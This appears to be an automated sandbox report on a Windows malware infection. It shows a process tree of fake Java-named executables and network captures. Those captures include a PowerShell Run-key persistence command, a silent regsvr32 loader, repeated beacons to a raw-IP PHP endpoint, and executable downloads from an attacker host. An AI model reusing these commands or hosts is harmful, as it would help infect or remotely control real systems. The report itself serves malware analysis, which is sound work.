        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        82⤵
        
        PID:2228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        83⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        84⤵
        
        PID:6904
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        85⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        86⤵
        
        PID:7780
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatformw.exe"
        87⤵
        Modifies registry key
        
        PID:7984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatformw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe\"'"
        87⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9368

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
1⤵
PID:552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\odaesN9fih4AcIOI.exe
1⤵
PID:11656
- C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\odaesN9fih4AcIOI.exe
  C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\odaesN9fih4AcIOI.exe
  2⤵
  PID:18024
- - C:\Users\Admin\AppData\Local\Temp\C1gHdBwU\W3sR8aPXD2vPvz6D.exe
    C:\Users\Admin\AppData\Local\Temp\C1gHdBwU\W3sR8aPXD2vPvz6D.exe 18024
    3⤵
    PID:18072
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 18072 -s 2272
      4⤵
      Program crash
      PID:25008
- - C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\arFL3HEDSZyAbgE1.exe
    C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\arFL3HEDSZyAbgE1.exe 18024
    3⤵
    PID:12492
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12492 -s 616
      4⤵
      Program crash
      PID:10820
- - C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\BMPoBBwOsuiwBl5E.exe
    C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\BMPoBBwOsuiwBl5E.exe 18024
    3⤵
    PID:8556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 11320 -ip 11320
1⤵
PID:6340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 11624 -ip 11624
1⤵
PID:18000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe"
1⤵
PID:19860
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
  2⤵
  PID:18196
- - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
    3⤵
    PID:18276
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      4⤵
      PID:24348
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        5⤵
        
        PID:24516
      - C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        6⤵
        
        PID:18372
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        7⤵
        
        PID:18044
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        8⤵
        
        PID:17988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        9⤵
        
        PID:18508
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        10⤵
        
        PID:18556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        11⤵
        
        PID:18612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        12⤵
        
        PID:18688
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupportw.exe"
        13⤵
        Modifies registry key
        
        PID:18740

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:20304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 18072 -ip 18072
1⤵
PID:24820

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:20380

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:20164

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:6336

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
1⤵
PID:6012
- C:\Windows\SysWOW64\regsvr32.exe
  /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
  2⤵
  PID:8372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:20832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 12492 -ip 12492
1⤵
PID:11084

Network

DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=2DCFC96C658067B91534DCD264A766DC; domain=.bing.com; expires=Thu, 23-Apr-2026 01:29:58 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 81DAE2D60F3C4EBAB39D682F9DDD29DB Ref B: LON04EDGE0711 Ref C: 2025-03-29T01:29:58Z
date: Sat, 29 Mar 2025 01:29:57 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2DCFC96C658067B91534DCD264A766DC

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=0N54XacHtm3nCRKcbNAFlTkJ5xphS-c5S7wWbRK6CM4; domain=.bing.com; expires=Thu, 23-Apr-2026 01:29:58 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F8D51DBA3810418AAF0A207B3FBF7A78 Ref B: LON04EDGE0711 Ref C: 2025-03-29T01:29:58Z
date: Sat, 29 Mar 2025 01:29:57 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f29578ad7de8418da4a2d1dff241a83c&localId=w:06EA7CA6-BA87-3CF1-1EE1-03E628C99C60&deviceId=6966580997104353&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2DCFC96C658067B91534DCD264A766DC; MSPTC=0N54XacHtm3nCRKcbNAFlTkJ5xphS-c5S7wWbRK6CM4

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5CC6FCD52A4D4478B7125E3491B7F082 Ref B: LON04EDGE0711 Ref C: 2025-03-29T01:29:58Z
date: Sat, 29 Mar 2025 01:29:57 GMT
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:29:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:32:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:32:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:32:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:32:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://176.113.115.7/files/8104437623/EPTwCQd.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/8104437623/EPTwCQd.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 10:23:36 GMT
ETag: "b2028-63164769fe274"
Accept-Ranges: bytes
Content-Length: 729128
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/7001656225/Rm3cVPI.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/7001656225/Rm3cVPI.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 09:12:13 GMT
ETag: "58800-63163774f5cc4"
Accept-Ranges: bytes
Content-Length: 362496
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/6691015685/UYpk7xI.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/6691015685/UYpk7xI.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 18:03:04 GMT
ETag: "9e800-6316ae1ccf3ea"
Accept-Ranges: bytes
Content-Length: 649216
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/rast333a/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/rast333a/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:04:49 GMT
ETag: "20be00-6316fef7b938e"
Accept-Ranges: bytes
Content-Length: 2145792
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/887739535/FMXv4s3.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/887739535/FMXv4s3.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 21:39:07 GMT
ETag: "b2028-6316de66f8a5c"
Accept-Ranges: bytes
Content-Length: 729128
Content-Type: application/x-msdos-program
DNS

wxayfarer.live

MSBuild.exe

Remote address:

8.8.8.8:53

Request

wxayfarer.live

IN A

Response
DNS

oreheatq.live

Rm3cVPI.exe

Remote address:

8.8.8.8:53

Request

oreheatq.live

IN A

Response

oreheatq.live

IN A

172.67.172.183

oreheatq.live

IN A

104.21.30.96
POST

https://oreheatq.live/gsopp

MSBuild.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 41
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmbBhomjevOAcOfOQoZBWHkSH6SeH2bqMRYvFg3Fu9TXtsgxn6yfdRSxFKjGHAjKEmI5LTPH%2FdevwiAKqbwHWuXn3k4Io4klT9jwTZsYkpJio3YrdCkhce5iaBaJLBfT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9997bb44cd25-LHR
alt-svc: h3=":443"; ma=86400
